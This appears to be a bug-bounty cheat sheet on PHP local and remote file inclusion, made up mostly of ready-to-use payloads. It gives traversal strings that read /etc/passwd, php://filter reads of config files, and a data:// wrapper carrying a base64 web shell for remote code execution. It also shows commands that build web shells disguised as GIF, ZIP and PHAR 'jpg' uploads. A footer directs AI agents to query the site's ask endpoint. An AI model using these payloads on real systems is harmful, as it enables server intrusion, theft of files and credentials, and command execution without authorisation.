# Local and Remote File Inclusion

## Basic Payloads&#x20;

```python
/etc/passwd
../../../../etc/passwd
/../../../etc/passwd	
./languages/../../../../etc/passwd
....//....//....//....//etc/passwd	
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64
non_existing_directory/../../../etc/passwd/./././.[./ REPEATED ~2048 times]  
../../../../etc/passwd%00
php://filter/read=convert.base64-encode/resource=config   
```

## PHP Wrappers to Read Source Code

```python
# make sure you are not adding php at the end

php://filter/read=convert.base64-encode/resource=config
```

## Data Wrapper to RCE

we can get LFI to RCE using DATA wrapper which can be used to include the external code, including PHP, but this will work only in 1 case that if **allow\_url\_include is enabled** for this we need to look at the php configuration file to see the allow\_url\_include is enabled or disabled

```python
php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini
```

With `allow_url_include` enabled, we can proceed with our `data` wrapper attack. As mentioned earlier, the `data` wrapper can be used to include external data, including PHP code. We can also pass it `base64` encoded strings with `text/plain;base64`, and it has the ability to decode them and execute the PHP code.

```python
echo '<?php system($_GET["cmd"]); ?>' | base64
```

<figure><img src="/files/u19X6u7pgaMZZenut7X0" alt=""><figcaption></figcaption></figure>

Now, we can **URL encode the base64 string**, and then pass it to the data wrapper

```python
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8+Cg==

# urlencode it
data://text/plain;base64,PD9waHAgc3lzdGVtKCRfR0VUWyJjbWQiXSk7ID8%2BCg%3D%3D&cmd=id
```

We have a successfull RCE.

<figure><img src="/files/rODuchSKnsiIMf2iTuYV" alt=""><figcaption></figcaption></figure>

## Remote File Inclusion (RFI)

In most languages, including remote URLs is considered as a dangerous practice as it may allow for such vulnerabilities. This is why remote URL inclusion is usually disabled by default. For example, any remote URL inclusion in PHP would require the `allow_url_include` setting to be enabled. We can check whether this setting is enabled through LFI

However, this may not always be reliable, as even if this setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with. So, a more reliable way to determine whether an LFI vulnerability is also vulnerable to RFI is to `try and include a URL`, and see if we can get its content.

```python
#host it on python server
echo '<?php system($_GET["cmd"]); ?>' > shell.php
```

<figure><img src="/files/l5phMc7v03McovSkcPe4" alt=""><figcaption></figcaption></figure>

## LFI and File Upload to RCE&#x20;

### Crafting Malicious Image

we can create a malicious image and then try to get RCE

```python
echo 'GIF8<?php system($_GET["cmd"]); ?>' > shell.gif
```

### ZIP Upload To RCE

We can utilize the [zip](https://www.php.net/manual/en/wrappers.compression.php) wrapper to execute PHP code. However, this wrapper isn't enabled by default, so this method may not always work. To do so, we can start by creating a PHP web shell script and zipping it into a zip archive (named `shell.jpg`), as follows:

```python
echo '<?php system($_GET["cmd"]); ?>' > shell.php && zip shell.jpg shell.php
```

### PHAR Upload

we can use the `phar://` wrapper to achieve a similar result. To do so, we will first write the following PHP script into a `shell.php` file:

```php
<?php
$phar = new Phar('shell.phar');
$phar->startBuffering();
$phar->addFromString('shell.txt', '<?php system($_GET["cmd"]); ?>');
$phar->setStub('<?php __HALT_COMPILER(); ?>');

$phar->stopBuffering();
```

This script can be compiled into a `phar` file that when called would write a web shell to a `shell.txt` sub-file, which we can interact with. We can compile it into a `phar` file and rename it to `shell.jpg` as follows:

```shell-session
php --define phar.readonly=0 shell.php && mv shell.phar shell.jpg
```

Now, we should have a phar file called `shell.jpg`. Once we upload it to the web application, we can simply call it with `phar://` and provide its URL path, and then specify the phar sub-file with `/shell.txt` (URL encoded) to get the output of the command we specify with (`&cmd=id`)


---

# Agent Instructions: Querying This Documentation

If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.

Perform an HTTP GET request on the current page URL with the `ask` query parameter:

```
GET https://notes.programmersecurity.com/bug-bounty/local-and-remote-file-inclusion.md?ask=<question>
```

The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.

Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.